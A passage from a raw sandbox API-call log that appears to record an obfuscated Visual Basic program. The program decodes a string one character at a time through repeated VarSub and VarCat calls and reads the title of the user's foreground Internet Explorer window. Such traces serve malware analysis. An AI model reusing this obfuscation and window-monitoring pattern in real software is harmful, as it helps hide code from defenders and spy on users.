pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.920] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0174.921] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.921] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0174.921] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.922] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0174.922] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.922] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.923] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.927] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.927] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.927] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0174.927] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.928] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.928] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.929] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.929] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.929] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0174.930] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.930] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.930] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.931] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.931] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.932] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.932] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.932] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.932] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.933] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0174.933] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.934] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0174.934] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0174.934] GetForegroundWindow () returned 0x10162 [0174.934] GetLastError () returned 0x0 [0174.934] SysStringLen (param_1=" ") returned 0xff [0174.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0174.935] SysStringLen (param_1=" ") returned 0xff [0174.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0174.935] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0174.935] GetLastError () returned 0x0 [0174.935] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0174.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0174.935] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0174.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0174.936] SysStringLen (param_1="Bla") returned 0x3 [0174.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Bla", cchWideChar=4, lpMultiByteStr=0x116863c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bla", lpUsedDefaultChar=0x0) returned 4 [0174.936] SetWindowTextA (hWnd=0x103c4, lpString="Bla") returned 1 [0174.936] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0174.936] GetFocus () returned 0x0 [0174.936] lstrlenA (lpString="Bla") returned 3 [0174.937] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116863c) returned 0x1 [0174.937] IsWindow (hWnd=0x103c4) returned 1 [0174.937] IsWindow (hWnd=0x103c4) returned 1 [0174.937] IsWindow (hWnd=0x103c4) returned 1 [0174.938] IsWindow (hWnd=0x103c4) returned 1 [0174.938] GetFocus () returned 0x0 [0174.938] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0174.938] GetFocus () returned 0x0 [0174.942] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0174.942] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0174.943] GetFocus () returned 0x0 [0174.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bla", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0174.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bla", cbMultiByte=-1, lpWideCharStr=0x116863c, cchWideChar=4 | out: lpWideCharStr="Bla") returned 4 [0174.943] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0174.943] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.944] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0174.944] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.945] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0174.945] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.945] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0174.946] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.946] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.946] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.947] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0174.947] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.948] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0174.948] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.949] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0174.949] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.950] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0174.950] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.950] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.951] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.951] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0174.951] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.952] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0174.952] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.953] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0174.953] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0174.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0174.954] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.150] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.151] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0175.151] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.152] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0175.152] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0175.153] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0175.153] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0175.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 